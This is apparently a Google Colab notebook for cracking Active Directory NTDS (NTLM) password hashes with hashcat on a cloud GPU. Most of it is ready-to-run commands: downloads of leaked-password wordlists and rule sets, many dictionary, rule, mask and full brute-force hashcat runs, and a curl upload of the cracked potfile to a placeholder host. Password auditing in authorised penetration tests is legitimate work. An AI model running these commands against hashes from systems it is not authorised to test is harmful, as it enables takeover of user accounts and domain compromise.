{ "nbformat": 4, "nbformat_minor": 0, "metadata": { "colab": { "name": "google_colab_hashcat.ipynb", "provenance": [], "collapsed_sections": [] }, "kernelspec": { "name": "python3", "display_name": "Python 3" }, "accelerator": "GPU" }, "cells": [ { "cell_type": "markdown", "metadata": { "id": "bcgg59uiIxrv" }, "source": [ "# Nephelees - NTDS cracking on Google Colab\r\n", "\r\n", "0. Open the `ipynb` file by clicking on the button **Open in Colab**\r\n", "1. Select **Runtime**, **Change runtime type**, and set **Hardware accelerator** to **GPU**. \r\n", "2. Select **Runtime**\" and **Run all\"** !\r\n", "3. On your local machine, run [hashonymize](https://github.com/ShutdownRepo/hashonymize) to anonymize your hash lists\r\n", "4. Upload your anonymized hashes list on the colab `!wget http://yourip:yourport/yourfile` or with the upload button\r\n", "5. Install requirements (hashcat + wordlists + rules)\r\n", "6. Run hashcat commands\r\n", "7. Recover the .pot file from the Google Colab `!curl --upload-file ~/.hashcat/hashcat.potfile http://yourip:yourport/` or download the file from the explorer in the left side of the panel.\r\n", "8. On your local machine, run the following hashcat command with the recovered potfile to match real usernames with cracked password `hashcat --potfile-path hashcat.potfile --hash-type 1000 --username example.ntds wordlists/rockyou.txt`\r\n", "\r\n", "\r\n", "**/!\\** For every 12hrs or so Disk, RAM, VRAM, CPU cache etc data that is on our alloted virtual machine will get erased. " ] }, { "cell_type": "code", "metadata": { "colab": { "base_uri": "https://localhost:8080/" }, "id": "A86GVzaW6YpT", "outputId": "fbeb72d7-0174-4812-91fe-6e74dba550ce" }, "source": [ "# Check GPU (Tesla P100 is the best GPU on Colab)\r\n", "!nvidia-smi -L" ], "execution_count": null, "outputs": [ { "output_type": "stream", "text": [ "GPU 0: Tesla P100-PCIE-16GB (UUID: GPU-711e1706-fccb-c944-73a8-796eb7a9d342)\n" ], "name": "stdout" } ] }, { "cell_type": "code", "metadata": { "id": "LWWa641VMu7Y" }, "source": [ "# Install Hashcat\r\n", "!apt install cmake build-essential -y\r\n", "!apt install checkinstall git -y\r\n", "!git clone https://github.com/hashcat/hashcat.git && cd hashcat && make -j 8 && make install" ], "execution_count": null, "outputs": [] }, { "cell_type": "code", "metadata": { "id": "_M4BMeXCNCA8" }, "source": [ "# Download wordlists\r\n", "import os\r\n", "wordlists_dir = \"wordlists\"\r\n", "os.system(\"wordlists_dir={}\".format(wordlists_dir))\r\n", "!mkdir ./$wordlists_dir\r\n", "\r\n", "!printf \"[+] Downloading the Rockyou wordlist...\\n\"\r\n", "!cd $wordlists_dir && wget https://download.weakpass.com/wordlists/90/rockyou.txt.gz\r\n", "!printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\r\n", "!cd $wordlists_dir && gunzip rockyou.txt.gz && rm rockyou.txt.gz\r\n", "!printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep rockyou)\"\r\n", "\r\n", "!printf \"[+] Downloading the KerberoastPW wordlist...\\n\"\r\n", "!cd $wordlists_dir && wget https://gist.github.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz\r\n", "!printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\r\n", "!cd $wordlists_dir && unxz kerberoast_pws.xz && rm kerberoast_pws.xz\r\n", "!printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep kerberoast_pws)\"\r\n", "\r\n", "!printf \"[+] Downloading the HashesOrg2019 wordlist...\\n\"\r\n", "!cd $wordlists_dir && wget https://download.weakpass.com/wordlists/1851/hashesorg2019.gz\r\n", "!printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\r\n", "!cd $wordlists_dir && gunzip hashesorg2019.gz && rm hashesorg2019.gz\r\n", "!printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep hashesorg2019)\"\r\n", "\r\n", "# !printf \"[+] Downloading the Have I been Pwned V7 wordlist...\\n\"\r\n", "# !cd $wordlists_dir && wget https://hashes.org/download.php?type=found&hashlistId=8161 -O \tHaveIbeenPwnedV7.txt\r\n", "# !printf \"[+] Wordlist downloaded !\\n[+]\\n\"\r\n", "# !printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep HaveIbeenPwnedV7)\"\r\n", "\r\n", "# 28 GB / https://download.weakpass.com/wordlists/1863/weakpass_2.gz\r\n", "# https://github.com/danielmiessler/SecLists/raw/5c9217fe8e930c41d128aacdc68cbce7ece96e4f/Passwords/Keyboard-Combinations.txt" ], "execution_count": null, "outputs": [] }, { "cell_type": "code", "metadata": { "id": "d1cxo70DQDxs" }, "source": [ "# Download rules\r\n", "import os\r\n", "rules_dir = \"/content/hashcat/rules\"\r\n", "os.system(\"rules_dir={}\".format(rules_dir))\r\n", "!mkdir ./$rules_dir\r\n", "\r\n", "!printf \"[+] Downloading the hob064 ruleset...\\n\"\r\n", "!cd $rules_dir && wget https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/hob064.rule\r\n", "!printf \"[+] Rules downloaded !\\n\"\r\n", "!printf \"[+] Location : $(ls $rules_dir | grep hob064)\"\r\n", "\r\n", "!printf \"[+] Downloading the d3adhob0 ruleset...\\n\"\r\n", "!cd $rules_dir && wget https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/d3adhob0.rule\r\n", "!printf \"[+] Rules downloaded !\\n\"\r\n", "!printf \"[+] Location : $(ls $rules_dir | grep d3adhob0)\"" ], "execution_count": null, "outputs": [] }, { "cell_type": "code", "metadata": { "id": "vNuhf2r4JxdD" }, "source": [ "# 2. Download your hashfile from your machine\n", "# for OPSEC reasons, please don't paste your hashes on a pastebin\n", "# use ngrok (https://ngrok.com/) + updog (https://github.com/sc0tfree/updog) instead if you don't have a public IP address\n", "!wget https://YOURLISTENERIP:YOURPORT/YOURFILE" ], "execution_count": null, "outputs": [] }, { "cell_type": "code", "metadata": { "id": "xYgvNWGbKXSp" }, "source": [ "# 3. Crack your hashes\n", "\n", "# Quick cracking - rockyou wordlist - around 10 minutes\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --username\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --rules-file /content/hashcat/rules/hob064.rule --username\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --rules-file /content/hashcat/rules/d3adhob0.rule --username\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --rules-file /content/hashcat/rules/dive.rule --username\n", "\n", "# Medium cracking - kerberoast wordlist - around 30 minutes\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --username\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --rules-file /content/hashcat/rules/hob064.rule --username\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --rules-file /content/hashcat/rules/d3adhob0.rule --username\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --rules-file /content/hashcat/rules/dive.rule --username\n", "\n", "# Insane cracking - hashesorg2019 wordlist - 2min + 8 min + 3h + 6h\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --username\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --rules-file /content/hashcat/rules/hob064.rule --username\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --rules-file /content/hashcat/rules/d3adhob0.rule --username\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --rules-file /content/hashcat/rules/dive.rule --username" ], "execution_count": null, "outputs": [] }, { "cell_type": "code", "metadata": { "id": "RCjfsWx6MwtT" }, "source": [ "# 4. More cracking materials\r\n", "import os\r\n", "pack_dir = \"pack\"\r\n", "os.system(\"pack_dir={}\".format(pack_dir))\r\n", "!mkdir ./$pack_dir\r\n", "\r\n", "!cd $pack_dir && wget https://raw.githubusercontent.com/iphelix/pack/master/statsgen.py\r\n", "!cd $pack_dir && wget https://raw.githubusercontent.com/iphelix/pack/master/maskgen.py\r\n", "!python2 $pack_dir/statsgen.py cracked.pot -o $pack_dir/hashcat.mask\r\n", "!python2 $pack_dir/maskgen.py $pack_dir/hashcat.mask --targettime 3600 --optindex -q -o $pack_dir/hashcat_1H.hcmask\r\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 3 /content/*.ntds $pack_dir/hashcat_1H.hcmask" ], "execution_count": null, "outputs": [] }, { "cell_type": "code", "metadata": { "id": "Zs5N4JmKVNWX" }, "source": [ "# 5. Wikipedia list\r\n", "!apt install hydra -y\r\n", "!cd /content/wordlists && wget http://download.wikimedia.org/nowiki/latest/nowiki-latest-pages-articles.xml.bz2\r\n", "!cd /content/wordlists && bzcat nowiki-latest-pages-articles.xml.bz2 | grep '^[a-zA-Z]' | sed 's/[-_:.,;#@+?{}()&|§!¤%`<>=\"\\/]/\\ /g' | tr ' ' '\\n' | sed 's/[0-9]//g' | sed 's/[^A-Za-z0-9]//g' | sed -e 's/./\\L\\0/g' | sed 's/[^abcdefghijklmnopqrstuvwxyzæøå]//g' | sort -u | pw-inspector -m1 -M20 > nowiki.lst\r\n", "!cd /content/wordlists && wc -l nowiki.lst\r\n", "\r\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/nowiki.lst --username\r\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/nowiki.lst --rules-file /content/hashcat/rules/hob064.rule --username\r\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/nowiki.lst --rules-file /content/hashcat/rules/d3adhob0.rule --username\r\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/nowiki.lst --rules-file /content/hashcat/rules/dive.rule --username" ], "execution_count": null, "outputs": [] }, { "cell_type": "code", "metadata": { "id": "D5T_SbzZNjhd" }, "source": [ "# 6. Full bruteforce for 8/9 characters and compliance masks\r\n", "# ----- around 3 hours on a p100 ------\r\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 /content/hashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask\r\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 ?l?d?u ?1?1?1?1?1?1?1?1\r\n", "# ----- more than 3 days on a P100 --------\r\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?a?a?a?a?a?a?a?a \r\n", "!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?a?a?a?a?a?a?a?a?a" ], "execution_count": null, "outputs": [] } ] }